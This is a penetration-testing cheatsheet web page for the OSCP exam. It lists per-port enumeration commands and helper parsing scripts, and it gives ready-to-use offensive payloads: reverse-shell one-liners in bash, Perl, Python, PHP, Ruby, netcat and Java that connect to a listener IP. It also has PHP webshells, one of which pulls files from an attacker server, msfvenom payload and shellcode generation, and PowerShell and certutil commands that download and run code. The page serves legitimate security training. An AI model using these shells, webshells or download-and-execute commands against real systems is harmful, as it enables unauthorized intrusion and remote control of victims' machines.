URL: https://www.noobsec.net/oscp-cheatsheet/

noobsec, by Karan Bhayani

Table of contents
 * General Enumeration - Nmap
 * Banner Grabbing
 * Port 21 - FTP
 * Port 22 - SSH
 * Port 53 - DNS
 * Port 79 - Finger
 * Port 80/443 - HTTP(S)
 * Port 110 - POP3
 * Port 139/445 - SMB
 * Port 161 - SNMP
 * Port 2049 - NFS
 * Shells / Payloads
   * Universal Listeners
   * Linux
   * Windows
   * PHP Webshells
   * Metasploit
 * Upgrading your shell - Linux
   * Escaping jailed Shells
 * File Transfers
   * Server
   * Linux - HTTP
   * Windows
 * Port Forwarding
   * Linux
   * Windows
 * Privilege Escalation
   * Windows
   * Linux


OSCP CHEATSHEET


GENERAL ENUMERATION - NMAP

Replace $ip with the target IP address.

Initial scan

nmap -Pn -n -vvv -oN nmap/initial $ip

If no ports are found, scan in parts

nmap -Pn -n -vvv -p1-500 -oN nmap/partial $ip

Scan all ports

nmap -Pn -n -vvv -p- -oN nmap/allports $ip

Targeted scanning - run default scripts and version detection only against the open ports found above

nmap -Pn -n -vvv -sC -sV -p22,80 -oN nmap/targeted $ip

UDP scanning (needs root; a full UDP sweep is slow, so start it early and let it run in the background)

sudo nmap -Pn -n -vvv -sU -oN nmap/udp $ip

Automated nmap scanning (my preference is nmapAutomator, it has never missed a port)

# It is recommended to scan ONE IP at a time
# Do NOT overload the network
# All scans, consecutively: Quick, Targeted, UDP, All ports, Vuln scan, CVE scan, Gobuster, Nikto
nmapAutomator $ip All
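The all-ports-then-targeted workflow above, as an added shell example (not code from the original cheatsheet): it parses an `nmap -oN` file into the comma-separated port list that the targeted `-sC -sV` scan needs, so nothing found by the full sweep is missed when typing the port list by hand. The nmap output below is constructed for the example; the `nmap/allports` and `nmap/targeted` file names follow the convention used above, and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original cheatsheet. Parses `nmap -oN` output and
# builds the targeted -sC -sV command for exactly the open ports found.
# Assumes nmap 7.x -oN line format, e.g. "22/tcp    open     ssh     syn-ack".
set -eu

# open_ports_from_nmap FILE -> comma-separated sorted open ports, e.g. "22,80,445"
open_ports_from_nmap() {
    # Keep only "<port>/<proto> open" lines; "filtered" and "closed" are dropped.
    grep -E '^[0-9]+/(tcp|udp)[[:space:]]+open' "$1" \
        | cut -d/ -f1 \
        | sort -n -u \
        | paste -s -d, -
}

# targeted_scan_cmd FILE IP -> prints the follow-up nmap command (does not run it);
# returns 1 when the file holds no open ports, so a caller can fall back to -p-.
targeted_scan_cmd() {
    ports=$(open_ports_from_nmap "$1")
    if [ -z "$ports" ]; then
        echo "no open ports in $1" >&2
        return 1
    fi
    printf 'nmap -Pn -n -vvv -sC -sV -p%s -oN nmap/targeted %s\n' "$ports" "$2"
}

# Constructed sample of nmap/allports for 10.11.1.5 (not a real scan result).
SAMPLE=$(mktemp)
cat > "$SAMPLE" <<'EOF'
# Nmap 7.94 scan initiated as: nmap -Pn -n -vvv -p- -oN nmap/allports 10.11.1.5
Nmap scan report for 10.11.1.5
Host is up, received user-set (0.020s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE    SERVICE      REASON
22/tcp    open     ssh          syn-ack
80/tcp    open     http         syn-ack
445/tcp   open     microsoft-ds syn-ack
8080/tcp  filtered http-proxy   no-response
# Nmap done -- 1 IP address (1 host up) scanned in 12.00 seconds
EOF

# Prints: nmap -Pn -n -vvv -sC -sV -p22,80,445 -oN nmap/targeted 10.11.1.5
targeted_scan_cmd "$SAMPLE" 10.11.1.5
```

Pipe the printed command into `sh` once you are happy with it, or keep it as a record of what was scanned. Filtered ports are deliberately left out; if the all-ports scan shows many of them, re-run it with a longer `--max-retries` rather than scripting around it.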


BANNER GRABBING

telnet $ip <port>
nc -nv $ip <port>
curl -iv http://$ip


PORT 21 - FTP

Nmap script scanning - will reveal anonymous access (ftp-anon) and the server version

nmap -Pn -n -vvv -p21 -sC -sV $ip

Checking anonymous access manually (any password is accepted for anonymous; an e-mail address is the convention)

ftp $ip
ftp> user anonymous
Password: anonymous

Easy view of FTP content - browse to:

ftp://$ip

Uploading a binary or webshell (switch to binary mode first so the file is not mangled, and check whether the FTP root is also the web root)

ftp> binary
ftp> put file/name


PORT 22 - SSH

Additional banner grabbing - the server version string and the accepted authentication methods are shown before the password prompt (add -v for the full handshake)

ssh root@$ip


PORT 53 - DNS

# Get the nameserver and domain name for the target (reverse lookup against the target's own DNS server)
nslookup
> server $target_ip
> $target_ip
# o/p: ns1.example.com

# Zone transfer (AXFR): lists every record in the zone, i.e. all sub-domains, if the server allows it
host -l -a example.com $target_ip # or ns1.example.com


PORT 79 - FINGER

Run this script with the following wordlist:

/usr/share/metasploit-framework/data/wordlists/unix_users.txt


PORT 80/443 - HTTP(S)

Get web server, version and potential OS from the response headers

curl -i http://$ip

Use Wappalyzer to identify the technologies, web server, OS and database server deployed.

View the source of pages to find interesting comments, directories, technologies, the web application being used, etc.

Finding hidden content

Scanning each sub-domain and interesting directory is a good idea.

# Use small common wordlist first
# Use big wordlist next
# Use CMS specific wordlist if one is found
gobuster dir -u http://$ip -w /wordlist -o gobust.out
# Find technology specific content
gobuster dir -u http://$ip -w /wordlist -o gobust_php.out -x php
# Find hidden notes, readme, changelog
gobuster dir -u http://$ip -w /wordlist -o gobust_txt.out -x txt

Files to browse manually

/robots.txt
/sitemap.xml
# Make it throw an error - the error page often leaks the server or framework version
/doesnotexist

Run web server scanning

# Identifies CMS
# Identifies Shellshock
nikto -host $ip -o nikto.txt

Web application specific scanning

WordPress (pass a WPScan API token with --api-token to get vulnerability data for the plugins, themes and users found)

wpscan --url http://$ip -e p,t,u --detection-mode aggressive > wpscan.log

Drupal, found here

droopescan scan drupal http://$ip -t 32


PORT 110 - POP3

# Login
telnet $ip 110
USER test
PASS test

# List mails
# O/P: <mail_number> <mail_length>
list
# View mail
retr <mail_number>
quit


PORT 139/445 - SMB

General enumeration

# "smb-*" also matches smb-brute and smb-flood (a DoS script); narrow it to
# --script "smb-enum-*,smb-os-discovery,smb-vuln-*" on anything you care about
nmap -Pn -n -p139,445 --script "smb-*" $ip
enum4linux -a $ip

Enumerate hostname

nmblookup -A $ip

Get version - script available here

./smbver.sh $ip [port]
msf> use auxiliary/scanner/smb/smb_version

List shares

Note: smbmap will state the access type available, smbclient will NOT. To check the access type using smbclient, it's best to access each share, read a file, and write a file.

smbmap -H $ip
# Get share items recursively
smbmap -H $ip -R <share>
smbmap -H $ip -d <domain> -u <user> -p <password>
smbclient -L //$ip -N
# Protocol Error? Old servers only speak SMB1
smbclient -L //$ip -N --option='client min protocol=NT1'
smbclient -L //$ip -U <user>

Connecting to a share

# Anonymously
smbclient //$ip/share -N
# Authenticated
smbclient //$ip/share -U <username>
# Protocol Error?
smbclient //$ip/share -N --option='client min protocol=NT1'


PORT 161 - SNMP

MIB values (Windows)

OID                        Parameter
1.3.6.1.2.1.25.1.6.0       System processes
1.3.6.1.2.1.25.4.2.1.2     Running programs
1.3.6.1.2.1.25.4.2.1.4     Process paths
1.3.6.1.2.1.25.2.3.1.4     Storage units
1.3.6.1.2.1.25.6.3.1.2     Software names
1.3.6.1.4.1.77.1.2.25      User accounts
1.3.6.1.2.1.6.13.1.3       TCP local ports

# Brute force community strings
# echo public > community
# echo private >> community
# echo manager >> community
# for ip in $(seq 1 254);do echo 10.11.1.$ip;done > snmp-ips
onesixtyone -c community -i snmp-ips

# Enumerate entire MIB tree (try -v2c as well; many devices only answer one version)
snmpwalk -c public -v1 $ip
# Enumerate specific MIB value
snmpwalk -c public -v1 $ip $MIB_Value

snmp-check $ip
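An added shell example for the SNMP section (not code from the original cheatsheet): it joins the "Running programs" walk (1.3.6.1.2.1.25.4.2.1.2, hrSWRunName) and the "Process paths" walk (1.3.6.1.2.1.25.4.2.1.4, hrSWRunPath) on their OID index, which is the process ID, into a single process listing. That joined view is how you spot a third-party binary running from an odd directory that is worth checking for weak permissions later. The snmpwalk output below is constructed; the parser accepts both the named form (MIBs loaded) and the bare numeric OID form, and the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original cheatsheet. Joins two snmpwalk outputs
# (hrSWRunName and hrSWRunPath) on their OID index, which is the process ID.
# Expected input lines (snmpwalk default output), named or numeric OIDs:
#   HOST-RESOURCES-MIB::hrSWRunName.1234 = STRING: "svchost.exe"
#   .1.3.6.1.2.1.25.4.2.1.2.1234 = STRING: "svchost.exe"
set -eu

# snmp_processes NAMES_FILE PATHS_FILE -> "pid<TAB>name<TAB>path", sorted by pid
snmp_processes() {
    awk -F'"' '
        # $1 is everything before the opening quote, e.g. "...hrSWRunName.1234 = STRING: ";
        # the OID index is the last dotted component before " = ". $2 is the quoted value.
        function pid(s) { sub(/ .*/, "", s); sub(/.*\./, "", s); return s }
        FNR == NR && /hrSWRunName|25\.4\.2\.1\.2\./ { name[pid($1)] = $2; next }
        /hrSWRunPath|25\.4\.2\.1\.4\./             { path[pid($1)] = $2 }
        END { for (p in name) printf "%s\t%s\t%s\n", p, name[p], path[p] }
    ' "$1" "$2" | sort -n
}

# snmp_find_process NAMES_FILE PATHS_FILE REGEX -> joined lines whose name or path matches
snmp_find_process() {
    snmp_processes "$1" "$2" | grep -i -- "$3" || true
}

# Constructed sample walks (not real device output). Names use the MIB form,
# paths use the numeric form, to show that both are handled.
NAMES=$(mktemp)
PATHS=$(mktemp)
cat > "$NAMES" <<'EOF'
HOST-RESOURCES-MIB::hrSWRunName.4 = STRING: "System"
HOST-RESOURCES-MIB::hrSWRunName.612 = STRING: "lsass.exe"
HOST-RESOURCES-MIB::hrSWRunName.1234 = STRING: "svchost.exe"
HOST-RESOURCES-MIB::hrSWRunName.2048 = STRING: "backup.exe"
EOF
cat > "$PATHS" <<'EOF'
.1.3.6.1.2.1.25.4.2.1.4.4 = STRING: ""
.1.3.6.1.2.1.25.4.2.1.4.612 = STRING: "C:\Windows\system32\"
.1.3.6.1.2.1.25.4.2.1.4.1234 = STRING: "C:\Windows\system32\"
.1.3.6.1.2.1.25.4.2.1.4.2048 = STRING: "C:\Backups\"
EOF

snmp_processes "$NAMES" "$PATHS"
```

Save the two walks with `snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.2 > names` and `... 1.3.6.1.2.1.25.4.2.1.4 > paths`, then run `snmp_processes names paths`. Anything outside `C:\Windows\` in the third column is a candidate for the Windows privilege escalation checks.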


PORT 2049 - NFS

# showmount talks to the NFS < v4 mount protocol (mountd); NFSv4-only servers will not answer it
# Enumerate the exported shares, and the clients currently mounting them
showmount -e $ip
showmount -a $ip

# Mounting, x = NFS version
sudo mount -t nfs -o vers=x $ip:<share> <local_dir>

# On the target machine
# List mounts flagged nosuid/noexec: SUID binaries and scripts will NOT run from these,
# so the mount points to plant a file on are the ones missing from this output
mount | grep 'nosuid\|noexec'
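The `mount | grep` check above shows the mounts where SUID and exec are blocked; what you actually want is the complement. The following is an added shell example (not code from the original cheatsheet) that parses saved `mount` output and prints the mount points lacking nosuid/noexec, plus an NFS-only filter for the ones you can write to from Kali. The `mount` output below is constructed and the function names are my own; the line format assumed is the util-linux one.

```shell
#!/bin/sh
# Added example, not from the original cheatsheet. Reads saved `mount` output
# and prints the mount points on which a SUID binary or script would run,
# i.e. those mounted WITHOUT nosuid or noexec. Format assumed (util-linux mount):
#   <source> on <mountpoint> type <fstype> (<opt>,<opt>,...)
set -eu

# suid_capable_mounts FILE -> "<mountpoint> <fstype> <options>" for mounts lacking nosuid/noexec
suid_capable_mounts() {
    awk '
        $2 == "on" && $4 == "type" {
            opts = $6; gsub(/[()]/, "", opts)
            n = split(opts, o, ","); blocked = 0
            for (i = 1; i <= n; i++) if (o[i] == "nosuid" || o[i] == "noexec") blocked = 1
            if (!blocked) print $3, $5, opts
        }
    ' "$1"
}

# nfs_suid_capable_mounts FILE -> same list restricted to nfs/nfs4, where a file
# planted from the attacking machine via the export lands directly on the target
nfs_suid_capable_mounts() {
    suid_capable_mounts "$1" | awk '$2 ~ /^nfs/'
}

# Constructed sample of `mount` output on a target (not from a real host).
MOUNTS=$(mktemp)
cat > "$MOUNTS" <<'EOF'
/dev/sda1 on / type ext4 (rw,relatime,errors=remount-ro)
tmpfs on /tmp type tmpfs (rw,nosuid,nodev,noexec,relatime)
10.11.1.5:/srv/share on /mnt/share type nfs4 (rw,relatime,vers=4.2,hard,proto=tcp,addr=10.11.1.5)
10.11.1.5:/srv/backup on /mnt/backup type nfs (rw,nosuid,relatime,vers=3,proto=tcp,addr=10.11.1.5)
/dev/sdb1 on /home type ext4 (rw,nosuid,nodev,relatime)
EOF

suid_capable_mounts "$MOUNTS"
nfs_suid_capable_mounts "$MOUNTS"
```

On the target, `mount > /tmp/m` and run `suid_capable_mounts /tmp/m`; with the sample above only `/` and `/mnt/share` qualify, and `/mnt/share` is the one reachable through the export. Whether a file you put there keeps its owner and SUID bit still depends on the export's squash options, which `showmount` does not reveal.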


SHELLS / PAYLOADS


UNIVERSAL LISTENERS

# Netcat (sudo is needed for ports below 1024; rlwrap gives command history and working arrow keys)
[sudo] rlwrap nc -nvlp <port>

# msf multi/handler - the payload must match the one the msfvenom binary was built with
msf> use exploit/multi/handler
msf(exploit/multi/handler)> set payload path/to/payload
msf(exploit/multi/handler)> set LHOST <ip> # or <interface>
msf(exploit/multi/handler)> set LPORT <port>
msf(exploit/multi/handler)> run


LINUX

--------------------------------------------------------------------------------

ONE-LINERS

Credit to Pentest Monkey

# Replace 10.10.10.10 / 443 with the listener IP and port

# bash
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/443 0>&1"

# Perl
perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP - fd 3 is the socket when the process has only fds 0-2 open; try 4, 5 or 6 if it does not work
php -r '$sock=fsockopen("10.10.10.10",443);exec("/bin/sh -i <&3 >&3 2>&3");'

# Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

# Netcat : -u for UDP
nc [-u] 10.10.10.10 443 -e /bin/bash

# Netcat without -e : -u for UDP
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [-u] 10.10.10.10 443 > /tmp/f

# Java (Groovy syntax, as on pentestmonkey)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/443;cat <&5 | while read line; do \\$line 2>&5 >&5; done"] as String[])
p.waitFor()

REVERSE SHELL SCRIPTS

PHP reverse shell available here, or locally on Kali:
/usr/share/webshells/php/php-reverse-shell.php

Python PTY shells available here


WINDOWS

PowerShell reverse shell available here. PHP reverse shell available here. Netcat for Windows available here.

# PowerShell
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
vi shell.ps1
# go to end of file, paste the following
Invoke-PowerShellTcp -Reverse -IPAddress [attacker_ip] -Port [attacker_port]
# close; the script now connects back as soon as it is loaded (e.g. via IEX of a DownloadString)

# Netcat - use the x64 or x86 binary as per target, and powershell.exe or cmd.exe as preferred
nc.exe <attacker_ip> <port> -e powershell.exe


PHP WEBSHELLS

# Basic. system() or shell_exec() or exec()
<?php system($_GET['cmd']); ?>

# More functional: fetch a file from your web server (?fupload=name) and run commands (?cmd=...)
<?php
$ip = 'http://10.10.14.4/'; // [:port] - change this
// Upload: pulls http://10.10.14.4/<name> and writes it next to the webshell as <name>
if (isset($_GET['fupload'])) {
    file_put_contents($_GET['fupload'], file_get_contents($ip . $_GET['fupload']));
}
// Execute: shell_exec() returns all output, exec() only the last line, system() echoes it directly
if (isset($_GET['cmd'])) {
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>


METASPLOIT

SYSTEM BINARIES

# Staged payloads (shell/reverse_tcp) need exploit/multi/handler with the same payload set;
# stageless payloads (shell_reverse_tcp) work with a plain nc listener.
# Pick x86 or x64 to match the target.

# Linux reverse shell - Staged
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell
# Linux reverse shell - Stageless
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf > shell

# Windows reverse shell - Staged (x86)
msfvenom -p windows/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe
# Windows reverse shell - Stageless (x64)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o reverse.exe

WEB

# PHP
msfvenom -p php/reverse_php LHOST=<ip> LPORT=<port> -f raw -o shell.php

# ASPX
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f aspx -o shell.aspx

# JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f raw -o shell.jsp

# WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=<port> -f war -o shell.war

SHELLCODE

Select the appropriate architecture. -f python or -f c prints the bytes as a string to paste into a buffer overflow exploit; add -b '\x00' (plus any other bad characters found) so the encoder avoids them.

# Linux Staged - use python or c
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Linux Stageless - use python or c
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python

# Windows Staged (x64) - use python or c
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<ip> LPORT=<port> -f python
# Windows Stageless (x86) - use python or c
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f python


UPGRADING YOUR SHELL - LINUX

Upon initial access, it is crucial to get the most functional shell possible (tab completion, a ctrl+c that does not kill the session, working editors) before starting privilege escalation.

# On the victim machine
which python python3
python3 -c 'import pty;pty.spawn("/bin/bash")'   # or python for python2
# background the shell with ctrl+z
# On Kali
stty -a # note the number of rows and columns of your local terminal
stty raw -echo
# foreground the process: type fg, press enter (what you type is not echoed)
# Back in the victim shell
stty rows xx
stty columns xxx
export TERM=xterm-256color


ESCAPING JAILED SHELLS

Go here


FILE TRANSFERS


SERVER

# HTTP - Apache2
# cp file /var/www/html/file_name
sudo service apache2 start

# HTTP - Python. Default port 8000, so give the port explicitly (root is needed below 1024)
# python2
sudo python -m SimpleHTTPServer 80
# python3
sudo python3 -m http.server 80

# SMB (-smb2support is needed for current Windows clients, which no longer speak SMB1)
sudo impacket-smbserver -smb2support <share_name> <path/to/share>

# FTP (anonymous read-only by default; add -w to allow uploads)
# apt-get install python3-pyftpdlib
sudo python3 -m pyftpdlib -p 21

# TFTP (UDP)
sudo atftpd --daemon --port 69 /path/to/serve

# Netcat
nc -nvlp <port> < file/to/send


LINUX - HTTP

# Wget
wget http://<ip>/file_name -O /path/to/save/file

# Netcat
nc -nv <ip> <port> > file/to/recv

# cURL
curl http://<ip>/file_name --output file_name


WINDOWS

 * HTTP

# Does not save the file on the system (runs the script in memory)
powershell.exe -nop -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://<ip>/<file_name>')"
# Saves the file on the system
powershell.exe -nop -ep bypass -c "iwr -uri http://<ip>/<file_name> -outfile path/to/save/file_name"
powershell.exe -nop -ep bypass -c "(New-Object Net.WebClient).DownloadFile('http://<ip>/<file_name>','path/to/save/file_name')"

certutil.exe -urlcache -split -f http://<ip>/file file_save

 * Wget.ps1 - build a download script from cmd.exe one line at a time (each echo appends to wget.ps1)

echo $storageDir = $pwd >> wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
# Download file from
echo $url = "http://<ip>/file_name" >> wget.ps1
# Save file as
echo $file = "file_name" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
# execute the script as follows
powershell.exe -nop -ep bypass -nol -noni -f wget.ps1

 * TFTP (UDP)

tftp -i <ip> get file_name

 * SMB

# cmd.exe
net use Z: \\<attacker_ip>\share_name
# To access the drive
Z:
# PowerShell
New-PSDrive -Name "notmalicious" -PSProvider "FileSystem" -Root "\\<attacker_ip>\share_name"
# To access the drive
notmalicious:

 * FTP

ftp <ip>
ftp> binary
ftp> get file_name

# Non-interactive downloader: write the ftp commands to a file and pass it with -s
# in cmd.exe do not use quotes in an echo command
echo open <ip> >> download.txt
echo anonymous >> download.txt
echo anon >> download.txt
echo binary >> download.txt
echo get file_name >> download.txt
echo bye >> download.txt
ftp -s:download.txt


PORT FORWARDING


LINUX

 * Local port forwarding - a port on Kali is tunnelled through the gateway to a host the gateway can reach

ssh <user>@<gateway> -L <local_port_to_listen_on>:<remote_host>:<remote_port>
# localhost:<local_port_to_listen_on> on Kali now reaches <remote_host>:<remote_port> as seen from the gateway

 * Remote port forwarding - run from the compromised host; exposes a port it can reach on Kali

ssh <user>@<kali_ip> -R <remote_port>:<local_host>:<local_port>
# localhost:<remote_port> on Kali now reaches <local_host>:<local_port> as seen from the compromised host

 * Dynamic port forwarding - a SOCKS proxy through the target, used with proxychains

ssh -D <local_proxy_port> -p <ssh_port> <user>@<target>


WINDOWS

Chisel is a port forwarding tool for Linux as well as Windows, works over HTTP and can be found here.

# On KALI - accept reverse forwards from clients
./chisel server --reverse --port 9001
# On Windows - expose WINDOWS_PORT (on the Windows host's loopback) as 127.0.0.1:KALI_PORT on Kali
.\chisel.exe client KALI_IP:9001 R:KALI_PORT:127.0.0.1:WINDOWS_PORT


PRIVILEGE ESCALATION


WINDOWS

Local enumeration + privilege escalation available here


LINUX

Local enumeration + privilege escalation available here

